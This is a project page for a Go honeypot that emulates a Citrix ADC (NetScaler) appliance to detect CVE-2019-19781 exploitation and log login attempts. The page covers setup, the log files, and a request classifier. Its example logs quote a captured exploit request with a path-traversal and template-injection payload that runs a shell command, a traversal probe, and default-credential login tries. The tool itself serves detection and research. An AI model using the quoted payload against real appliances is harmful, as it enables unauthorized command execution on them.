
x1sec / citrix-honeypot

Licence: MIT license
Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts

Programming Languages

go

Projects that are alternatives of or similar to citrix-honeypot

citrixmash scanner
A fast multi threaded scanner for Citrix ADC (NetScaler) CVE-2019-19781 - Citrixmash / Shitrix
Stars: ✭ 36 (+50%)
Mutual labels:  citrix, cve-2019-19781, shitrix, citrixmash
citrix-adc-aws-cloudformation
Citrix ADC (Formerly Netscaler) templates and scripts for AWS deployment
Stars: ✭ 11 (-54.17%)
Mutual labels:  citrix-netscaler, citrix, citrix-adc
go-nitro
A Golang client to the Citrix ADC API
Stars: ✭ 18 (-25%)
Mutual labels:  citrix-netscaler, citrix, citrix-adc
check netscaler
A Nagios Plugin written in Perl for the Citrix ADC (formerly Citrix NetScaler). It uses the NetScaler NITRO API.
Stars: ✭ 36 (+50%)
Mutual labels:  citrix-netscaler, citrix
terraform-provider-citrixadc
Terraform Custom Provider for Citrix ADC (formerly Citrix NetScaler)
Stars: ✭ 89 (+270.83%)
Mutual labels:  citrix-netscaler, citrix-adc
Deception As Detection
Deception-based detection techniques mapped to MITRE's ATT&CK framework
Stars: ✭ 228 (+850%)
Mutual labels:  honeypot
Tpotce
🍯 T-Pot - The All In One Honeypot Platform 🐝
Stars: ✭ 3,105 (+12837.5%)
Mutual labels:  honeypot
Hfish
Secure, reliable, simple and free enterprise-grade honeypot
Stars: ✭ 2,977 (+12304.17%)
Mutual labels:  honeypot
Secure Wireguard Implementation
A guide on implementing a secure Wireguard server on OVH (or any other Debian VPS) with DNSCrypt, Port Knocking & an SSH-Honeypot
Stars: ✭ 200 (+733.33%)
Mutual labels:  honeypot
fakessh
A dockerized fake SSH server honeypot written in Go that logs login attempts.
Stars: ✭ 42 (+75%)
Mutual labels:  honeypot
prickly-pete
A script using Docker to quickly bring up some honeypots exposing lots of services. For research, reconnaissance, and fun. (DISCLAIMER may not be fun, not to be taken internally, aim away from face)
Stars: ✭ 29 (+20.83%)
Mutual labels:  honeypot
Trapdoor
Serverless honeytoken 🕵🏻‍♂️
Stars: ✭ 70 (+191.67%)
Mutual labels:  honeypot
Chameleon
Customizable honeypots for monitoring network traffic, bots activities and username\password credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, SMTP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres and MySQL)
Stars: ✭ 230 (+858.33%)
Mutual labels:  honeypot
ZKShS
Search shodan without any knowledge about its queries
Stars: ✭ 37 (+54.17%)
Mutual labels:  honeypot
honeycomb
An extensible honeypot framework
Stars: ✭ 93 (+287.5%)
Mutual labels:  honeypot
Honeybits
A PoC tool designed to enhance the effectiveness of your traps by spreading breadcrumbs & honeytokens across your systems to lure the attacker toward your honeypots
Stars: ✭ 222 (+825%)
Mutual labels:  honeypot
Loki
A lightweight web honeypot (A Little Web Honeypot).🍯🍯🍯🐝🐝🐝
Stars: ✭ 151 (+529.17%)
Mutual labels:  honeypot
Telnet Iot Honeypot
Python telnet honeypot for catching botnet binaries
Stars: ✭ 252 (+950%)
Mutual labels:  honeypot
List Of User Agents
List of major web + mobile browser user agent strings. +1 Bonus script to scrape :)
Stars: ✭ 247 (+929.17%)
Mutual labels:  honeypot
Ehoney
A safe, fast, highly interactive and enterprise level honeypot management system, supports multiple protocol honeypots, honeytokens, baits and other functions.
Stars: ✭ 1,051 (+4279.17%)
Mutual labels:  honeypot

Citrix ADC (NetScaler) Honeypot

  • Detects and logs payloads for CVE-2019-19781 (Shitrix / Citrixmash)
  • Logs failed login attempts
  • Serves content and headers taken from a real appliance to increase the chance of being indexed by search engines (e.g. Google, Shodan)


Installation

Precompiled

A precompiled Linux (x64) package is available from the project's GitHub releases:

mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz

go get

If you have a Go environment ready to go:

go get github.com/x1sec/citrix-honeypot

Running

Generate a self-signed certificate:

# Private key (EC, secp384r1); for an RSA key use: openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
# Self-signed certificate valid for 3650 days
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650

Then it's as easy as:

./citrix-honeypot

The honeypot listens on both ports 80 and 443, so it must be run as the root user.

Or to detach and run as a background process:

nohup ./citrix-honeypot &

Logs

Results are written to the ./log directory. The files are:

hits.log - Scanning attempts and exploitation attempts with all data (e.g. headers, post body)

all.log - All HTTP requests that are observed hitting the server

logins.log - Attempted logins to the web interface

tlsErrors.log - Often internet scanners will send invalid data to port 443. HTTPS errors are logged here.

Examples

Running the first publicly released exploit against the honeypot:

$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb

Scanning attempt:

$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0
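
The distinction between the two hits.log entry types above, as an added Go example (not the honeypot's own source; the Classify helper and its verdict names are hypothetical). It assumes the handler reads the raw request target, since Go's http.ServeMux redirects paths containing .. segments to a cleaned URL, and it goes beyond the two logged requests by also catching percent-encoded traversal.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Verdicts mirror the two hits.log headings: "Scanning detected" and "Exploitation detected".
const (
	None    = "none"
	Scan    = "scan"
	Exploit = "exploit"
)

// Classify (hypothetical helper) takes the method and the raw request target (r.RequestURI in net/http).
func Classify(method, rawURI string) string {
	path := rawURI
	if i := strings.IndexByte(path, '?'); i >= 0 {
		path = path[:i] // ignore the query string
	}
	// Decode once so "%2e%2e" is treated like ".."; on a malformed escape keep the raw path.
	if dec, err := url.PathUnescape(path); err == nil {
		path = dec
	}
	path = strings.ToLower(path)
	if !strings.Contains(path, "/../vpns/") {
		return None
	}
	// POST to a .pl script under /vpns/portal/scripts/ matches the exploitation entry; other traversal is a probe.
	if method == "POST" && strings.Contains(path, "/vpns/portal/scripts/") &&
		strings.HasSuffix(path, ".pl") {
		return Exploit
	}
	return Scan
}

func main() {
	// Constructed samples; the first two targets come from the log excerpts above.
	samples := [][2]string{
		{"POST", "/vpn/../vpns/portal/scripts/newbm.pl"},
		{"GET", "/vpn/../vpns/cfg/smb.conf"},
		{"GET", "/vpn/%2e%2e/vpns/cfg/smb.conf"},
		{"GET", "/vpn/index.html"},
	}
	for _, s := range samples {
		fmt.Printf("%-7s %-4s %s\n", Classify(s[0], s[1]), s[0], s[1])
	}
}
```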

Login attempts:

$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin